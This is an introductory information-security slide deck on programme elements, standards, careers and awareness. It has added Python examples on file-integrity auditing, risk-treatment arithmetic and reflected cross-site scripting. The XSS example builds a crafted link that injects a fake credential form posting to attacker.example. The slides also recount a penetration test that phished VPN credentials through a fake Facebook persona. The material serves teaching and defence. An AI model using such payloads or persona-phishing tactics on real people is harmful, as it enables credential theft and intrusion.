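Worked example of the last technical control listed above, file integrity auditing. This code is added here for illustration and is not from the original slides: it baselines a directory tree with SHA-256, re-hashes it later and reports the files that were added, removed or modified. The directory and the files it creates (a fake etc/passwd, etc/hosts and etc/ld.so.preload) are constructed for the demonstration.

```python
"""File-integrity audit: baseline a directory tree with SHA-256, then detect drift.

Added example (not code from the original slides). It demonstrates the 'file
integrity auditing software' control: record a hash of every file while the
system is known-good, and compare later scans against that baseline. The
directory and files created in demo() are constructed for the demonstration.
"""
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=65536):
    """Hash a file in chunks so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map each regular file under root (path relative to root, '/' separated) to its digest."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks and special files; only regular files are hashed
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare_baseline(baseline, current):
    """Return sorted lists of paths that were added, removed or modified since the baseline."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def demo():
    """Baseline a constructed tree, tamper with it three ways, and report the drift."""
    with tempfile.TemporaryDirectory() as root:
        etc = os.path.join(root, "etc")
        os.makedirs(etc)
        with open(os.path.join(etc, "passwd"), "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")
        with open(os.path.join(etc, "hosts"), "w") as fh:
            fh.write("127.0.0.1 localhost\n")
        baseline = build_baseline(root)

        # Simulated tampering: a uid-0 account appended, a file removed, a loader hook dropped in.
        with open(os.path.join(etc, "passwd"), "a") as fh:
            fh.write("backdoor:x:0:0::/:/bin/sh\n")
        os.remove(os.path.join(etc, "hosts"))
        with open(os.path.join(etc, "ld.so.preload"), "w") as fh:
            fh.write("/tmp/evil.so\n")

        return compare_baseline(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9}: {paths}")
```

A baseline is only as trustworthy as its storage: keep it (or a signature over it) off the monitored host and run the comparison from a separate system or read-only media, otherwise an attacker with write access can simply re-baseline after tampering. Tools such as AIDE and Tripwire implement this same pattern with more attributes per file (permissions, owner, inode, timestamps).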
13. Key Information Security Program Elements
[Figure: the three elements of a security program, People, Process and Technology]
14. Key Information Security Program Elements
People:
- Training
- Awareness
- HR Policies
- Background Checks
- Roles / responsibilities
- Mobile Computing
- Social Engineering
- Social Networking
- Acceptable Use
- Policies
- Performance Mgt
Technology:
- System Security
- UTM, Firewalls
- IDS/IPS
- Data Center
- Physical Security
- Vulnerability Assmt
- Penetration Testing
- Application Security
- Secure SDLC
- SIM/SIEM
- Managed Services
Process:
- Risk Management
- Asset Management
- Data Classification
- Info Rights Mgt
- Data Leak Prevention
- Access Management
- Change Management
- Patch Management
- Configuration Mgmt
- Incident Response
- Incident Management
15. Essential Information Security Practices
• MANAGEMENT COMMITMENT
• RISK MANAGEMENT
• ASSET INVENTORY AND MANAGEMENT
• CHANGE MANAGEMENT
• INCIDENT RESPONSE AND MANAGEMENT
• CONFIGURATION MANAGEMENT
• TRAINING AND AWARENESS
• CONTINUOUS AUDIT
• METRICS AND MEASUREMENT
18. Risk Management
• Risk is defined in ISO 31000 as the effect of uncertainty on objectives
(whether positive or negative).
• Risk management : the identification, assessment, and prioritization of
risks followed by coordinated and economical application of resources
to minimize, monitor, and control the probability and/or impact of
unfortunate events or to maximize the realization of opportunities.
• Risks can come from uncertainty in financial markets, project failures,
legal liabilities, credit risk, accidents, natural causes and disasters as
well as deliberate attacks from an adversary.
• Strategies to manage risk :
– Avoidance (eliminate, withdraw from or not become involved)
– Reduction (optimise - mitigate)
– Sharing (transfer - outsource or insure)
– Retention (accept and budget)
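Worked example of choosing between the four treatment strategies above. This is added code, not from the original slides, and it uses one widely used quantitative method that the slides do not name: annualised loss expectancy, ALE = SLE x ARO (single loss expectancy times annual rate of occurrence), compared against the yearly cost of each candidate control or insurance. The decision rule, the risks, the treatments and every figure are constructed for the demonstration and are not taken from ISO 31000.

```python
"""Choosing a risk treatment from expected loss and control cost.

Added example, not from the original slides. For each risk it applies the
four strategies listed in the deck (avoidance, reduction, sharing, retention)
using ALE = SLE x ARO. The decision rule and all figures are constructed for
the demonstration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    name: str
    sle: float  # single loss expectancy: cost of one occurrence
    aro: float  # annual rate of occurrence: expected events per year

    @property
    def ale(self):
        return self.sle * self.aro


@dataclass(frozen=True)
class Treatment:
    """A candidate control ('reduce') or insurance ('share').

    aro_factor and sle_factor are the fractions of ARO and SLE that remain
    after the treatment (1.0 = unchanged). Insurance leaves ARO alone and cuts
    the retained SLE; a technical control typically cuts one or both.
    """
    name: str
    strategy: str       # "reduce" or "share"
    annual_cost: float  # licences, staff, premium... per year
    aro_factor: float = 1.0
    sle_factor: float = 1.0

    def residual_ale(self, risk):
        return risk.sle * self.sle_factor * risk.aro * self.aro_factor

    def total_annual_cost(self, risk):
        """Expected yearly outlay with the treatment in place: residual loss plus the treatment."""
        return self.residual_ale(risk) + self.annual_cost


def choose_treatment(risk, options, appetite):
    """Return (strategy, treatment name or None, expected annual cost).

    Rule used here (an assumption of this example):
      1. retain when the inherent ALE is already within the risk appetite;
      2. otherwise pick, among options that pay for themselves (total cost
         below the inherent ALE) and bring residual ALE within appetite, the
         one with the lowest total annual cost;
      3. if nothing qualifies, avoid: stop or redesign the activity.
    """
    if risk.ale <= appetite:
        return ("retain", None, risk.ale)
    viable = [o for o in options
              if o.total_annual_cost(risk) < risk.ale
              and o.residual_ale(risk) <= appetite]
    if not viable:
        return ("avoid", None, 0.0)
    best = min(viable, key=lambda o: o.total_annual_cost(risk))
    return (best.strategy, best.name, best.total_annual_cost(risk))


# Constructed figures for the demonstration (currency units per year).
APPETITE = 20_000.0

RANSOMWARE = Risk("ransomware on the file server", sle=200_000, aro=0.5)  # ALE 100,000
RANSOMWARE_OPTIONS = [
    Treatment("offline backups + endpoint detection", "reduce", 30_000, aro_factor=0.4, sle_factor=0.25),
    Treatment("cyber insurance, 80% cover", "share", 25_000, sle_factor=0.2),
]
LAPTOP_THEFT = Risk("loss of an encrypted laptop", sle=5_000, aro=2.0)  # ALE 10,000
LEGACY_FTP = Risk("breach via legacy internet-facing FTP", sle=500_000, aro=0.2)  # ALE 100,000
LEGACY_FTP_OPTIONS = [
    Treatment("front with WAF and patch monthly", "reduce", 80_000, aro_factor=0.5),
]


def demo():
    return {
        RANSOMWARE.name: choose_treatment(RANSOMWARE, RANSOMWARE_OPTIONS, APPETITE),
        LAPTOP_THEFT.name: choose_treatment(LAPTOP_THEFT, [], APPETITE),
        LEGACY_FTP.name: choose_treatment(LEGACY_FTP, LEGACY_FTP_OPTIONS, APPETITE),
    }


if __name__ == "__main__":
    for name, (strategy, treatment, cost) in demo().items():
        print(f"{name}: {strategy} {treatment or ''} (expected annual cost {cost:,.0f})")
```

The ransomware risk is reduced (the backup/EDR control leaves less residual loss for less money than insurance), the laptop risk is retained because it already sits within appetite, and the legacy FTP service is avoided because the only control costs more than the loss it prevents. In practice the SLE and ARO inputs are the hard part; the arithmetic only makes the trade-off explicit.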
20. The driver … Malicious Motivation
[Figure: motivations that lead to an attack: criminal intent, coercion, greed, showing off, revenge, curiosity]
21. Hackers 'n' Crackers
• During the 1960s, the word "hacker" grew to prominence describing a person with strong computer skills, an extensive understanding of how computer programs worked, and a driving curiosity about computer systems.
• True hackers were computer programming enthusiasts who pushed computer systems to their limits without malicious intent and followed a hacker code of ethics.
• They believed technical information should be freely available to any person, and they abided by a code of ethics that looked down upon destroying, moving, or altering information in a way that could cause injury or expense.
• Hacking, however, soon became nearly synonymous with illegal activity, and negative publicity surrounding hackers continued to grow.
22. Hackers 'n' Crackers
• While the first incidents of hacking dealt with breaking into phone systems, hackers also began diving into computer systems as technology advanced.
• Hacking became increasingly problematic during the 1980s and, as a result, the US Computer Fraud and Abuse Act was created, imposing more severe punishments for those caught abusing computer systems. In the early 1980s, the FBI made one of its first arrests related to hacking.
• In response, several hacker groups coined the term 'cracker' in 1985 to define a person who broke into computer systems and ignored hacker ethics; however, the media continued to use the word hacker.
23. Profiling …. the color of your hat!
White Hat: also known as friendly hackers; they use their knowledge for good reasons.
Black Hat: also known as crackers, these are the ones to watch out for. They write and send viruses, destroy data, deface websites, break into people's machines and engage in other illegal activity. This type of hacker has a bad reputation.
Grey Hat: borderline white/black hats. They sometimes prank unsuspecting users and cause general mayhem. While they think this kind of activity is harmless, they may face long periods of jail time if they are ever found out.
Not to forget the hatless:
- Script Kiddies
- The Hobbyist
- Insider
- Countries
24. • Information Security is implemented in organizations based on standards, guidelines and frameworks.
• Other drivers are laws and regulations, customer requirements, contractual standards, etc.
• All require the adoption of best practices.
25. Common Standards / Frameworks / Guidelines / Regulatory
• ISO 27001:2005
• PCI-DSS
• CobiT
• BS 25999
• ISO 20000
• ITIL
• Clause 49 (SEBI Guideline, Government of India)
• CTCL
• NERC-CIP
• Data Protection Act
• IT Act and applicable Criminal / Civil legislation
• HIPAA
• GLBA
• Sarbanes Oxley
• Basel II
• PCAOB
• SAS 70
• Privacy Laws (e.g. PIPEDA)
• … many more…
26. • ISO 27001, BS 25999, CobiT, ITIL or ISO 20000
• These are the most widely used and recognized standards for information security and its supporting management disciplines globally.
• ISO 27001, CobiT etc. form the foundation of security for various other frameworks and regulatory requirements.
27. ISO 27001: 2005
• "Information security is the protection of information from a wide range of threats in order to ensure business continuity, minimize business risk, and maximize return on investments and business opportunities."
28. ISO 27001 Fundamental Principles
The ISMS follows the Plan, Do, Check, Act (PDCA) development, improvement and maintenance cycle:
• Plan: establish the ISMS (define the context and carry out the risk assessment)
• Do: design and implement the ISMS
• Check: monitor and review the ISMS
• Act: maintain and improve the ISMS
29. ISO 27001 Fundamental Principle
[Figure: the Plan, Do, Check, Act cycle]
30. ITIL ®
• The Information Technology Infrastructure Library (ITIL) is a set of concepts and practices for IT service management (ITSM), IT development and IT operations.
• ITIL gives detailed descriptions of a number of important IT practices and provides comprehensive checklists, tasks and procedures that any IT organization can tailor to its needs. ITIL is published in a series of books, each of which covers an IT management topic. The five core volumes are:
• Service Strategy
• Service Design
• Service Transition
• Service Operation
• Continual Service Improvement
33. BS 25999
• The standard for Business Continuity Management.
• Part 1 : Code of Practice
– Section 1 - Scope and Applicability.
– Section 2 - Terms and Definitions.
– Section 3 - Overview of Business Continuity Management.
– Section 4 - The Business Continuity Management Policy.
– Section 5 - BCM Programme Management.
– Section 6 - Understanding the Organization.
– Section 7 - Determining BCM Strategies.
– Section 8 - Developing and Implementing a BCM Response.
– Section 9 - Exercising, Maintenance, Audit and Self-assessment of the BCM Culture.
– Section 10 - Embedding BCM into the Organization's Culture.
• Part 2 : Specification
– Section 1 - Scope.
– Section 2 - Terms and Definitions.
– Section 3 - Planning the Business Continuity Management System (PLAN).
– Section 4 - Implementing and Operating the BCMS (DO).
– Section 5 - Monitoring and Reviewing the BCMS (CHECK).
– Section 6 - Maintaining and Improving the BCMS (ACT).
34. Essential Information Security Practices
• MANAGEMENT COMMITMENT
• RISK MANAGEMENT
• ASSET INVENTORY AND MANAGEMENT
• CHANGE MANAGEMENT
• INCIDENT RESPONSE AND MANAGEMENT
• CONFIGURATION MANAGEMENT
• TRAINING AND AWARENESS
• CONTINUOUS AUDIT
• METRICS AND MEASUREMENT
35. Data Loss Statistics
• General information about data loss and breaches
• Snapshot of CERT reported incidents:
– 2001 - 52,658
– 2002 - 82,094
– 2003 - 137,529
36. Internet Users
[Figure: Internet user growth]
39. Size / Business Does Not Matter
[Figures: data breach by industry type; number of employees by percent of breaches. 13 percent of breached organizations had recently been merged or acquired.]
Source: Verizon Data Breach Investigations Report 2009
41. Profession and Career
• Statistics for online habits
• Some common risks
• What can you do for yourself, the college and the community
42. Information Security Certifications
ISACA - Information Systems Audit and Control Association
• CISA - Certified Information Systems Auditor
• CISM - Certified Information Security Manager
• CGEIT - Certified in the Governance of Enterprise IT
• CRISC - Certified in Risk and Information Systems Control
(ISC)²
• CISSP - Certified Information Systems Security Professional
• SSCP - Systems Security Certified Practitioner
Institute of Internal Auditors
• CIA - Certified Internal Auditor
• CGAP - Certified Government Auditing Professional
• CFSA - Certified Financial Services Auditor
• CCSA - Certification in Control Self-Assessment
PMI
• PMP - Project Management Professional
The Security Industry Association (SIA)
• CSPM - Certified Security Project Manager
43. Information Security Certifications
ITIL
• ITIL Service Management Foundations Certificate
• ITIL Service Manager
• ITIL Practitioner
DRI International (Disaster Recovery Institute)
• ABCP - Associate Business Continuity Professional
• CBCP - Certified Business Continuity Professional
• CFCP - Certified Functional Continuity Professional
• MBCP - Master Business Continuity Professional
Association of Certified Fraud Examiners (ACFE)
• CFE - Certified Fraud Examiner
Forensics - EnCase
• EnCE - EnCase Certified Examiner
Cisco
• CCSP - Cisco Certified Security Professional
44. Career Specializations
1. Computer forensics – Learn forensic investigation tools and techniques to investigate cyber crimes and financial crimes.
2. IT security auditor – Focus on auditing capabilities. As part of this, explore platforms like mainframes, SAP and core banking platforms as your areas of expertise.
3. Application security specialist – Specialize in areas like secure coding, security testing tools and techniques, secure design of web applications, and threat modelling.
4. Compliance specialist – Focus on helping organizations comply with standards and regulations such as ISO 27001, PCI DSS, HIPAA, FDA and Sarbanes-Oxley.
5. Security solutions architect – Specialize in secure network architecture, security solutions procurement and deployment, and hardening of infrastructure.
6. Security trainer – Focus on spreading knowledge about information security and creating awareness at all levels.
7. Cyber law expert – Combine knowledge of the Indian IT (Amendment) Act 2008 with IT knowledge and forensics know-how.
45. Some Required Skills or Traits
1. High level of passion – Security changes on an almost daily basis: there are new tools, attack vectors and vulnerabilities being discovered almost hourly. A security professional can remain ahead of the game only by constantly keeping up to date, and this requires a high amount of passion for the field.
2. Creativity – Be it a penetration test or developing an automated way to carry out a particular activity, a high level of creativity is a must in every aspect of a security professional's job. Thinking out of the box is an almost daily activity for a security professional.
3. A never-say-die attitude – Security issues are typically complex, and often there are no easy solutions. Quite often the situations are also very high-pressure: the client has been hacked, or someone inside has leaked critical internal data, or systems have to be hardened before going live. A seasoned security professional knows that there is a solution on the other side of every problem and is willing to be as resourceful as it takes to find the right one.
4. Grasp of a wide range of subjects – Security is not just about policies and procedures, or buffer overflows, or SQL injection. Most security issues stem from, and can be resolved by, human intervention. A security professional should not only be well-versed in a wide range of technologies, but should also be reasonably acquainted with the basics of psychology, economics, finance and physical security.
46. Technology Skills
• Application Development
• Secure SDLC
• Networking
• Vulnerability Assessment
• Penetration Testing
• System Hardening
• Device Support
• Wireless Security
• …
On any given day, there are approximately 225 major incidents of security breach reported to the CERT Coordination Center at Carnegie Mellon University.
47. Risks and Awareness
• Common and uncommon risks
• Statistics about online habits
• What can you do for yourself, the college and the community
49. Securing Yourself
• Common sense
• Awareness
• Regularly apply patches and updates
• Anti-virus, anti-spyware…
• Be careful on P2P filesharing .. what you download
• Read the computer message(s)
• Don't blindly click next > next > next
• Be careful when you read email, especially if it belongs to someone else
• Don't try to open every attachment
• Keep your password to yourself
• Cyber Security – Cyberethics – Cybersafety
52. How many friends are online and in real life?
53. So what have you done online lately?
• I have connected with old friends online
• Rekindled a relationship online
• Shared a secret or two, or some personal stuff, online
57. What Can You Do
• Cyber security (viruses, online habits, filesharing etc.) – Cyberethics (copying and use of IP) – Cybersafety (identity protection, cyber bullying etc.)
• Educate your friends and family (trojans, keyloggers, phishing, scams)
• Secure home computers, for yourself and for family/friends (wireless, backup etc.)
• Take care of your social networking risks
58. What Can You Do (2)
• Think out of the box
• Evaluate tools and technologies as part of your projects
• Develop tools and scripts
• Share findings with industry, government and law enforcement
• Research and study malware trends and defense methods
• Create a virtual library of your work so your peers and followers will also benefit
• Contribute to institutional security policies and procedures
• Conduct network assessments in the college from time to time and share the findings with all
59. Future trends / opportunities
• Social networking compliance assurance
• Unified communication
• Microblogging
• Intelligent search
• Mobile apps
60. Case Study
• Factual Facebook Hack Case Study
– http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html
• Twitter Hack
• Hotmail Outage leads to malware offering sites
• Clicking Blindly
61. About Us
• Some information about Open Security Alliance
62. Open Security Alliance
A small group of professionals working in Information Security got together to discuss life beyond the technical stuff which non-techies find difficult to understand.
So these guys got together to work under the OSA banner to present risks, threats and vulnerabilities in easy and understandable language, just to make sure the non-geek understands the problems as well and gets as scared as the IS guy.
• OSA - an open community of individuals who are committed to providing the benefit of their knowledge and expertise to the community.
• OSA - individual initiatives to undertake research and studies in Information Security (India centric) and then provide the learning to the community.
• …. The underlying thought is to Be The Change.
63. Contact Information
• Dinesh O Bareja
– M: +91.9769890505
– E: dineshbareja@gmail.com
– E: dinesh@opensecurityalliance.org
– Twitter: @bizsprite
– Linked In (India Information Security Community)
65. Disclaimer
• All logos and brand names belong to their respective owners and we do not claim any relationship or association, implied or otherwise, with them.
• Use of any materials by virtue of relationships and associations, if any, is mentioned explicitly.
• We have taken care to attribute all sources for external materials used in this presentation, and any oversight is regretted. If you, as owner or as viewer, find any reason to dispute the use of these materials, kindly communicate the same to us at "issues AT opensecurityalliance DOT org".
• Any omissions, in terms of attribution, may be due to an error on our part and are not intentional.
This document is a creation of securians.com and is released in the public domain under Creative Commons License (Attribution-Noncommercial 2.5 India) http://creativecommons.org/licenses/by-nc-sa/2.5/in/.
Disclaimer: The practices listed in the document are provided as is and as guidance, and the authors do not claim that these comprise the only practices to be followed. Readers are urged to make informed decisions in their usage. Feedback is solicited and you can access other topics at our website www.securians.com
Contributors: Dinesh O Bareja Reviewers: Vicky Shah
Title: Information Security … the profession; concepts, risks and more..
Version: 1.0 / February 2010
66. References
• Educause Video Contest
http://www.educause.edu/SecurityVideoContest
• CERT
• India CERT
• NIST
• OWASP
• SANS
67. Social Networking Case Study : Facebook Hack
• The threat from social networks comes from social engineering: employees post company information, which the attacker collects during reconnaissance; the attacker then infiltrates the social network that exists between the employees and uses that trust to phish for VPN passwords or any other information.
The Facebook hack case study is from an assignment carried out by SnoSoft and presents a unique insight into the threats and risks exposed on such sites.
68. Facebook Hack Step 1 : Reconnaissance
• Conduct social and technical reconnaissance
• Social
– 1400 employees identified through the internet, of which 900 used social networking sites like Facebook, Orkut, LinkedIn, MySpace etc.
– Studied about 200 profiles and created a false identity
• Technical
– Probed the corporate website and identified Cross-Site Scripting vulnerabilities (which the researchers expected and hoped to find)
A cross-site scripting ("XSS") vulnerability is most frequently found in websites that do not have sufficient input validation or output encoding. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. The injection can be done server side, by saving the injected code on the server (in a forum, blog, etc.), or client side, by injecting the code into a specially crafted URL that is delivered to a victim.
69. Facebook Hack Step 2: Setup
• Used a client side attack as opposed to a server side attack because it enabled the selection of only those users that we were interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page.
• A payload was created and designed to render a legitimate-looking, https-secured web page that appeared to be a component of the customer's web site.
• When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered.
• In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided.
• When the user's credentials were entered, the form submitted them to http://www.netragard.com, where they were extracted by an automated tool that had been created.
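Worked example of the flaw steps 1 and 2 rely on, reflected (client side) cross-site scripting, shown vulnerable and fixed. This is added code and is not from the original slides or from the SnoSoft/Netragard engagement. A search page echoes its q parameter: the vulnerable handler concatenates it into the HTML, so a crafted link carries attacker markup that the victim's browser renders under the customer's own domain and certificate; the fixed handler HTML-encodes the value. The payload and the hosts customer.example and attacker.example are constructed for the demonstration.

```python
"""Reflected XSS: a search page that echoes its 'q' parameter, vulnerable and fixed.

Added example; not code from the original slides or from the engagement they
describe. The crafted link, the fake form and the hosts customer.example and
attacker.example are constructed for the demonstration.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

PAGE = "<html><body><h1>Search results for: {query}</h1></body></html>"


def query_param(url):
    """Extract the first 'q' value from a URL's query string ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_search_vulnerable(url):
    """Echoes the parameter verbatim: whatever markup the link carries is rendered as HTML."""
    return PAGE.format(query=query_param(url))


def render_search_fixed(url):
    """Output-encodes the parameter so the browser displays it as text, not markup."""
    return PAGE.format(query=html.escape(query_param(url), quote=True))


# Constructed 'specially crafted link' of the kind step 2 describes: the injected
# markup is a fake 'verify your account' form whose action points at a host the
# attacker controls, while the address bar still shows www.customer.example.
FAKE_FORM = (
    '<form action="https://attacker.example/collect" method="post">'
    "Your account may have been compromised. Please verify: "
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Verify"></form>'
)
CRAFTED_LINK = "https://www.customer.example/search?q=" + quote(FAKE_FORM, safe="")


def submits_to_foreign_host(rendered, own_host="www.customer.example"):
    """True if the rendered page contains a form that posts to a host other than our own."""
    marker = '<form action="'
    pos = rendered.find(marker)
    while pos != -1:
        start = pos + len(marker)
        action = rendered[start:rendered.find('"', start)]
        if urlsplit(action).netloc not in ("", own_host):
            return True
        pos = rendered.find(marker, start)
    return False


if __name__ == "__main__":
    print("vulnerable page posts off-site:", submits_to_foreign_host(render_search_vulnerable(CRAFTED_LINK)))
    print("fixed page posts off-site:     ", submits_to_foreign_host(render_search_fixed(CRAFTED_LINK)))
```

Because the injected form is rendered by the customer's own site, the padlock and certificate the victim sees are genuine, which is what made the "verify your credentials" alert convincing. Output encoding at the point where untrusted data meets HTML is the fix; input validation alone does not stop this, and a Content-Security-Policy form-action directive restricted to the site's own origin would additionally block the off-site submission.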
70. Facebook Hack Step 3: Create Profile
• After the payload was created and tested we started the process of building an easy-to-trust Facebook profile.
• Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female.
• A fitting photograph was found by searching Google Images and used for the fake Facebook profile.
• The profile was populated with information about our experiences at work by using combined stories that were collected from real employee Facebook profiles.
72. Facebook Hack Step 4: Attack Launch
• Upon completion we joined the company Facebook group.
• The joining request was approved in a matter of hours, and within twenty minutes of being accepted as group members, legitimate customer employees began sending friendship requests.
• In addition we made hundreds of outbound requests.
• The friends list grew very quickly and included managers, executives, secretaries, interns, and even contractors.
• Having collected a few hundred friends, we began chatting.
73. Facebook Hack Step 5: Attack On
• Conversations were based on work related issues that we were able to collect from legitimate employee profiles.
• After a period of three days of conversing and sharing links, we posted our specially crafted link to our Facebook profile. The title of the link was "Omigawd have you seen this I think we got hacked!"
…. and people started clicking on the link and verifying their credentials.
• Ironically, the first set of credentials that we got belonged to the hiring manager.
74. Facebook Hack Step 6: Success
• Using those credentials one had access to the web VPN, which in turn gave access to the network.
• Those credentials also allowed access to a majority of systems on the network including the Active Directory server, the mainframe, pump control systems, the Checkpoint firewall console, etc.
The Facebook hack had worked.
75. Hotmail Outage
• Tuesday, February 16, 2010
• Hotmail Users Look for Answers in Dangerous Places
• An outage of the Windows Live ID service affected a large number of MSN users today, including users of the popular Hotmail email service. Hotmail is one of the largest web based email outlets and, not surprisingly, news of the outage spread quickly as users were not able to access their email.
Those hoping to find more information on Google may have ended up with more than they bargained for. Blackhats have once again worked their magic to infect users looking for news related to the outage. In fact, 8 out of the top 10 results for "hotmail service unavailable" returned dangerous URLs.
78. Le Twitter Hack
[Screenshots of the Twitter hack, from lalawaq.com]
80. Clicking Blindly
Case Study : Clicking blindly!
[Video stills from EDUCAUSE, with sound effects: "Settled in for a nice bit of surfing in the library! Study! Ah hah! Just don't click the link blindly! Whoops! That's a big load of malware you just got."]
81. You don't want to look like this!
82. [Image: Case Study : Clicking blindly!]